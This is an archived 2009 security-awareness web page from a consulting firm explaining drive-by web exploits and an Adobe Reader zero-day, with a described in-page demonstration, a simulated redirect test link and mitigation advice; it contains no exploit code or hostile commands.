The "No Network is 100% Secure" series
- Drive-by web site exploits -
A free, safe test


All rights reserved - may not be copied without permission
Easyrider LAN Pro, NOC Design Consultants

Contact Us


Share/Bookmark

There is absolutely NO malware on this page!: Do not be alarmed by the various demonstration messages and alerts on this page. And while there is absolutely no malware on this page, always be aware that allowing ANY plug-in is a risky proposition these days. Our advice is to always "just say NO!"

What is a drive by exploit?: A drive-by is an action that is automatically performed on your computer without your consent or even your knowledge. Unlike a pop-up, which asks for assent (albeit in a calculated manner likely to lead to a "yes"), a drive-by can be initiated by simply visiting a Web site or viewing an HTML e-mail message. If your computer's security settings are lax, it may be possible for drive-by exploits to be performed without any action on your part.

In addition to downloading malware, drive by sites will commonly probe a visiting computer to see if it has any one of dozens of known vulnerabilities. These include vulnerabilities for which there is currently no patch to correct. It is estimated that any given computer will have an average of eight vulnerabilities... any one of which could cause a visiting computer to be compromised. It is important to note that a large percentage of drive by sites are legitimate web sites that have themselves been compromised, typically via an SQL injection exploit.

Drive-by infections are a major security issue. In April 2007, researchers at Google discovered hundreds of thousands of Web pages that initiated drive-by exploits. One in ten pages was found to be suspect. Sophos researchers in 2008 reported that they were discovering more than 6,000 new infected Web pages every day, or about one every 14 seconds. Many of these infections are connected to botnets, in which each PC is turned into a zombie that may then be directed to further malicious activity, like spam or DDoS attacks.

This page collects (and displays, for your review) the same types of information that malicious web sites use to attack visiting computers. This information is used to tailor an attack strategy. Not only is the browser and operating system probed for vulnerabilities. Drive by sites endeavor to learn about any installed application or plug-in that might be vulnerable to attack.

Demonstration: For demonstration purposes, we have disabled the use of your ALT key on this page. This should give you some idea just how much control hackers have over your browsing session and, in fact, over your entire computer. It would be trivial to remap certain keys to get you to unwittingly download a virus. But in reality, there are easier ways to infect your computer without your knowledge. Assume that we have also disabled your mouse (again, trivial to do). Try shutting down your browser session by doing an ALT F Close. Doesn't work, huh? Sure, there are ways around what we did (this time).. but you can be sure that hackers would plug all of the back doors so that you would be 100% under their control.

Starting to understand why these drive-by sites are so insidious?


Listed below is just some of the information that miscreant hackers know about you when you visit a hacked web site. These sites will silently check to see if any operating system, application, plug-in and other software is vulnerable. If a vulnerability is found, it will be immediately exploited. Users no longer have to actually do something (e.g. opening an e-mail attachment) to have a virus or trojan installed on their computer.




You have visited this page times.



Your IP address is:

Plug-ins installed:


MIME types installed:

Check your vulnerability to a drive-by exploit: Click on the "How vulnerable am I?" button above to run a (completely safe) test. If a new window does NOT open, you are about as safe as you can be, at least until these hackers come up with some new exploit. Note that you still need to have ALL of your software (not just the operating system) patched to the latest level since there are lots of other ways to pick up trojans and viruses besides visiting a compromised, infected drive-by web site.

Here's another safe little test you can try:

Click on http://easyrider.easyrider.com/hackers_white_paper.htm There is no malicious code on this page! However, around 80,000 legitimate business, church, government and other web sites are currently unknowingly infected with SQL or javascript injections. Clicking on the above link will simulate what will happen during a so-called "drive by" infection except that if you were really infected, you'd never know it. You'd be automatically and instantly redirected to a criminal web site where your computer, browser and various installed applications would be quietly probed for any of dozens of common vulnerabilities. If one or more vulnerabilities is detected, they will immediately and silently be exploited and poof!... your computer is infected. If your browser allows the above URL to come up unchallenged, your users are definitely vulnerable to drive-by exploits. Again, this web page is 100% safe. It is merely a test case example. NOTE: if your AV software scans web sites for safety, it will not detect this type of drive-by in most cases since the first thing the drive-by does is send your browser to a different web site. It's all over but the crying before your AV software knows what happened.

An important note: And worth repeating... you or your users don't need to actually do anything to be infected by many of these viruses and trojans that are out there such as gumlar. Simply visiting a legitimate site such as Walmart or whitehouse.gov, if it's been compromised, is all it takes. There's some 80,000 of these perfectly legitimate web sites that are currently and unknowingly compromised. Once you visit a compromised web site, that's it. You don't have to click on anything.. you don't have to do a single thing. And in fact, there's not a thing you can do to prevent getting infected at this point. If your computer is vulnerable to any one of dozens of exploits... some of which do not even have patches available to fix, you're cooked!

Adobe confirms PDF zero-day attacks. Disable JavaScript now!: If you're like me you probably regret ever installing Adode. It seems like it's just one vulnerability after another with these guys... and most of the time (like now) there is no patch to correct the problem... Worse still, there is little to no detection of these malicious PDF files from most of the major Antivirus vendors.

Malicious hackers are exploiting a zero-day (unpatched) vulnerability in Adobe's ever-present PDF Reader/Acrobat software to hijack data from compromised computers. According to an advisory from Adobe, the critical vulnerability exists in Adobe Reader and Acrobat 9.2 and earlier versions. It is being exploited in the wild as of 12/11/09.

This latest vulnerability is actually in a JavaScript function within Adobe Acrobat [Reader] itself. Furthermore the vulnerable JavaScript is obfuscated inside a zlib stream making universal detection and intrusion detection signatures much more difficult. In the interim, Adobe PDF Reader/Acrobat users are urged to immediately disable JavaScript:

Click: Edit -> Preferences -> JavaScript and uncheck Enable Acrobat JavaScript

Or, better yet, use an alternative PDF Reader software program.

Drive-by Poll
Did you find the information here to be helpful?
Yes
No


About the Author

Frank Saxton is a computer network security engineer and Easyrider LAN Pro principle. Home-based in Portland, Oregon, Frank has been designing remote diagnostic and network enterprise monitoring centers since the late 1970s. Prior to becoming a professional systems engineering consultant in 1990, Frank had a 20 year career in computer systems field engineering and field engineering management. Frank has a BSEE from Northeastern University and holds several certifications including Network General's Certified Network Expert (CNX). As a NOC design engineer and architect, Frank works regularly with enterprise-class monitoring tools such as HP Openview Operations, BMC Patrol and others. In his enterprise security audit work, Frank uses sniffers and other professional grade monitoring tools on a daily basis.


Next in the security white paper series:

How Cyber Criminals will mature over the next ten years
High value sites recent hacks
Still more 2009 hacks in the news
IT employment challenges of the 21st century
Employment reference checking white paper
Competency Certifications White Paper
Firewall White Paper
Password White Paper
Digital Identification Certificates White Paper
Virus White Paper
Ghostnet White Paper
Cryptography White Paper
OpenID White Paper
Intrusion Detection Systems IDS White Paper
Rootkit White Paper
Unnecessary Windows XP Services White Paper
Scareware White Paper
Exaflood Internet Brownout White Paper
Cloud Computing White Paper
Proxy Server White Paper
Personal Computer PC Security White Paper
Phishing White Paper
DNS Poisoning White Paper
Conficker White Paper
SPAM White Paper
Best Practices White Paper
Denial of Service DoS White Paper
Trojan Virus Attacks White Paper
Port Scanning White Paper
Monitoring Basics 101 White Paper
Monitoring Basics 102 White Paper
Monitoring Basics 103 White Paper
Virtual Machine Security White Paper
Aurora vulnerability White Paper
Shelfware White Paper
Outsourcing White Paper

Easyrider LAN Pro Consulting services:

Network Security Audit and PC Tune-up service

- Proxy server installation and configuration
- Enterprise security consultations
- Disaster recovery planning
- Disaster recovery services
- Capacity, migration and upgrade planning
- Build and deploy central syslog server
- Build trouble ticket systems
- Design and build monitoring environments
- Design and build Network Operations Centers (NOC)
- HP Openview, BMC Patrol consulting

Last modified March 25, 2009
Copyright 1990-2009 Easyrider LAN Pro